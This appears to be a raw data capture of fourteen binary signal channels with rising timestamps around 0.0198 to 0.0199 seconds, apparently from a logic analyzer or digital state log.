0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9788596e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9788620e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9788644e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,1.9788648e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9788652e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9788696e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9788720e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.9788724e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9788728e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9788748e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9788772e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9788796e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9788820e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9788844e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9788868e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9788876e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9788920e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9788948e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9788952e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9788972e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9788996e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9789000e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9789044e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9789068e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9789076e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9789096e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9789120e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9789144e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9789172e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9789196e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9789220e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9789224e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9789272e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9789300e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.9789304e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9789308e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9789324e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9789348e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9789372e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9789396e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9789404e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9789420e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9789448e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9789452e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9789496e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9789524e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9789572e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9789596e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9789620e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9789648e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9789672e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9789700e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9789724e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9789748e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9789756e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9789772e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9789796e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9789820e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9789848e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9789872e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9789900e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9789924e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9789948e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9789972e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9789996e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9790020e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9790048e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9790072e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9790100e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9790124e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9790148e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9790152e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9790196e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9790220e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9790248e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9790272e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.9790276e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9790280e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9790300e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9790324e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9790348e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9790372e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9790396e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9790420e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9790428e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9790472e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9790500e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.9790504e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9790508e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9790524e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9790548e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9790572e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9790596e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9790620e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9790648e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9790672e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9790700e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9790748e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9790772e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9790780e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9790796e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9790820e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9790848e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9790872e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9790900e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9790924e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9790948e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9790972e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9790996e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9791020e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9791048e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9791072e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9791076e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9791124e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9791148e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9791156e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9791172e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9791196e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9791220e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9791248e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9791272e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9791300e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9791348e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9791372e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9791396e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9791420e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9791428e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9791448e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9791472e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9791500e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9791524e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9791548e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9791572e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,1.9791576e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9791580e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9791620e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9791648e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.9791652e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9791656e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9791672e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9791700e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9791748e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9791772e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9791780e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9791820e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9791848e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9791900e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9791924e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9791928e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9791948e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9791972e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9791980e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9791996e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9792020e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9792048e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9792072e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9792100e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9792124e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9792148e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9792172e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9792196e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9792220e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9792228e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9792248e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9792272e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9792300e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9792324e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9792348e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9792372e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9792380e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9792424e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9792448e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9792472e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9792500e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9792548e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9792572e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9792596e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9792620e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9792628e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9792648e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9792672e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9792700e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9792724e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9792748e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9792772e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,1.9792776e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9792780e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9792820e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9792848e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.9792852e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9792856e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9792872e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9792900e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9792924e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9792948e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9792972e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9792996e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9793020e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9793048e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9793072e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9793100e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9793124e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9793148e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9793172e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9793196e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9793220e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9793248e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9793272e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9793300e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9793324e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9793348e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9793372e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9793396e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9793420e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9793448e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9793472e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9793492e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9793524e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9793548e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9793580e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9793604e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9793628e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9793652e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9793680e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9793704e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,1.9918124e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.9918324e-02 1,1,1,0,0,0,0,0,0,0,0,1,0,1,1.9918356e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.9918384e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,1.9918668e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.9918696e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,1.9918716e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.9918740e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,1.9918768e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.9918792e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,1.9918820e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.9918844e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,1.9918868e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.9918892e-02 1,1,1,0,0,0,0,0,0,1,0,0,0,1,1.9918896e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,1,1.9918900e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,1,1.9918944e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9918956e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9918968e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9918976e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9918992e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9919020e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9919044e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9919068e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9919092e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9919116e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9919140e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9919168e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9919192e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9919220e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9919244e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9919268e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9919272e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9919316e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9919344e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9919348e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9919368e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9919392e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9919396e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9919444e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9919468e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9919476e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9919492e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9919516e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9919540e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9919568e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9919592e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9919620e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9919644e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9919668e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9919692e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9919716e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9919740e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9919768e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9919792e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9919820e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9919844e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9919868e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9919892e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9919916e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9919940e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9919968e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9919992e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9920020e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9920068e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9920092e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9920100e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9920116e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9920140e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9920168e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9920192e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9920220e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9920244e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9920268e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9920292e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9920316e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9920340e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9920368e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9920392e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9920420e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9920444e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9920468e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9920492e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9920516e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9920540e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9920548e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9920596e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9920620e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,1.9920624e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9920628e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9920644e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9920668e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9920692e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9920716e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9920740e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9920768e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9920772e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9920820e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9920844e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9920852e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9920868e-02 1,1,1,0,0,0,0,0,0,1,0,0,0,0,1.9920892e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9920896e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9920944e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9920968e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,1.9920972e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9920976e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9921020e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9921044e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9921092e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9921116e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9921168e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9921196e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9921252e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9921276e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9921284e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9921328e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9921352e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9921380e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9921404e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9921428e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9921452e-02 1,1,1,0,0,0,0,0,0,1,0,0,0,0,1.9921456e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9921460e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9921476e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9921500e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9921528e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9921552e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9921560e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9921604e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9921628e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9921676e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9921700e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9921728e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9921752e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9921780e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9921804e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9921828e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9921852e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9921876e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9921900e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9921928e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9921952e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9921980e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9922004e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9922028e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9922052e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9922076e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9922108e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9922132e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9922156e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9922160e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9922204e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9922228e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9922236e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9922256e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9922280e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9922308e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9922332e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9922356e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9922380e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9922404e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9922428e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9922436e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9922480e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9922508e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,1.9922512e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9922516e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9922532e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9922556e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9922580e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9922604e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9922628e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9922656e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9922680e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9922704e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9922708e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9922756e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9922780e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9922788e-02 